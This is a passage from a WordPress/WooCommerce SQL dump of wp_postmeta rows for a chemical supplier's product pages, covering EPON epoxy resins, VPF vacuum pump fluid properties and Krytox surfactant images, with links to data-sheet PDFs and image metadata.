}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9692, 948, '_edit_lock', '1474469701:2'); 
INSERT INTO `wp_postmeta` VALUES (9693, 948, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9694, 949, '_wp_attached_file', '2016/08/1031.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9695, 948, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9696, 948, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9697, 948, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9698, 948, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9699, 948, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9700, 948, '318_custom_list_file', 'a:2:{s:32:"6b38c98ee38cb64eb8d58d5deb1de512";a:3:{s:4:"name";s:9:"EPON 1031";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1031.pdf";s:4:"desc";s:13:"EPON 1031 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9701, 948, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9702, 948, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9703, 948, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9704, 948, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9705, 948, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9706, 948, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9707, 948, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9708, 948, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9709, 948, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9710, 948, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9711, 948, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9712, 948, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9713, 948, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9714, 948, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9715, 948, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9716, 948, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9717, 948, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9718, 948, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9719, 948, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9720, 948, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9721, 948, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9722, 948, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9723, 948, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9724, 948, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9725, 948, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9726, 948, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9727, 948, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9728, 948, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9729, 948, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9730, 948, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9731, 950, '_wp_attached_file', '2016/08/IMG_12561.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9732, 950, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12561.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12561-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12561-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12561-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12561-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12561-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12561-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12561-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12561-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9733, 951, '_wp_attached_file', '2016/08/IMG_12551.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9734, 951, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12551.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12551-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12551-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12551-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12551-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12551-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12551-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12551-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12551-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9735, 948, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9736, 952, '_edit_lock', '1474470058:2'); 
INSERT INTO `wp_postmeta` VALUES (9737, 952, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9738, 953, '_wp_attached_file', '2016/08/Su-8.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9739, 952, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9740, 952, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9741, 954, '_edit_lock', '1475671411:2'); 
INSERT INTO `wp_postmeta` VALUES (9742, 954, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9743, 954, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9744, 954, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9745, 954, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="6" width="1214"><strong>VPF Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;"><strong>1506</strong></td>\r\n<td style="text-align: center;"><strong>1514</strong></td>\r\n<td style="text-align: center;"><strong>1525</strong></td>\r\n<td style="text-align: center;"><strong>1531</strong></td>\r\n<td style="text-align: center;"><strong>16256</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Kinematic Viscosity (cSt)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>@20°C</strong></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">140</td>\r\n<td style="text-align: center;">250</td>\r\n<td style="text-align: center;">310</td>\r\n<td style="text-align: center;">2560</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">4.1</td>\r\n<td style="text-align: center;">7.2</td>\r\n<td style="text-align: center;">10.6</td>\r\n<td style="text-align: center;">12.5</td>\r\n<td style="text-align: center;">64.6</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Density (g/cc)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>@20°C</strong></td>\r\n<td style="text-align: center;">1.88</td>\r\n<td style="text-align: center;">1.89</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.92</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">1.73</td>\r\n<td style="text-align: center;">1.74</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.78</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point °C (°F)</strong></td>\r\n<td style="text-align: center;">-60(-76)</td>\r\n<td style="text-align: center;">-54(-76)</td>\r\n<td style="text-align: center;">-48(-54)</td>\r\n<td style="text-align: center;">-41(-42)</td>\r\n<td style="text-align: center;">-15(5)</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">No</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9746, 954, '716_default_editor', '<ul>\r\n 	<li>Vacuum Pumps</li>\r\n 	<li>Semi-Conductors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9747, 954, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D1160</li>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9748, 954, '318_custom_list_file', 'a:1:{s:32:"1ba57932add5f8af8c408e4082fafaed";a:3:{s:4:"name";s:7:"VPF SDS";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VPF.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (9749, 954, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9750, 954, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9751, 954, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9752, 954, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9753, 954, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9754, 954, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9755, 954, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9756, 954, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9757, 954, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9758, 954, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9759, 954, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9760, 954, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9761, 954, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9762, 954, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9763, 954, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9764, 954, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9765, 954, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9766, 954, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9767, 954, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9768, 954, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9769, 954, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9770, 954, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9771, 954, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9772, 954, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9773, 954, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9774, 954, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9775, 954, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9776, 954, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (9777, 954, '_thumbnail_id', '908'); 
INSERT INTO `wp_postmeta` VALUES (9804, 952, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9805, 952, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9806, 952, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9807, 952, '318_custom_list_file', 'a:2:{s:32:"b414bb697b6015ce3680fc6367aa6699";a:3:{s:4:"name";s:9:"EPON SU-8";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Su-8.pdf";s:4:"desc";s:13:"EPON SU-8 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9808, 952, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9809, 952, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9810, 952, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9811, 952, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9812, 952, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9813, 952, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9814, 952, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9815, 952, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9816, 952, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9817, 952, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9818, 952, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9819, 952, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9820, 952, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9821, 952, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9822, 952, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9823, 952, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9824, 952, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9825, 952, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9826, 952, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9827, 952, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9828, 952, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9829, 952, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9830, 952, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9831, 952, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9832, 952, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9833, 952, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9834, 952, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9835, 952, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9836, 952, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9837, 952, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9838, 954, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9839, 954, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9840, 954, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9841, 955, '_edit_lock', '1474650386:3'); 
INSERT INTO `wp_postmeta` VALUES (9842, 955, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (9843, 956, '_edit_lock', '1474296283:2'); 
INSERT INTO `wp_postmeta` VALUES (9844, 956, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9845, 957, '_wp_attached_file', '2016/08/krytox-surfactant-1-oil-fsh.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9846, 957, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:39:"2016/08/krytox-surfactant-1-oil-fsh.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-surfactant-1-oil-fsh-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-surfactant-1-oil-fsh-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9847, 958, '_wp_attached_file', '2016/08/krytox-surfactant-2-oil-fsh.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9848, 958, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4798;s:6:"height";i:4798;s:4:"file";s:39:"2016/08/krytox-surfactant-2-oil-fsh.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-surfactant-2-oil-fsh-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsh-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9849, 959, '_wp_attached_file', '2016/08/krytox-surfactant-2-oil-fsl.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9850, 959, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/08/krytox-surfactant-2-oil-fsl.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-surfactant-2-oil-fsl-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-surfactant-2-oil-fsl-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9852, 956, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9853, 956, '_stock_status', 'instock'); 
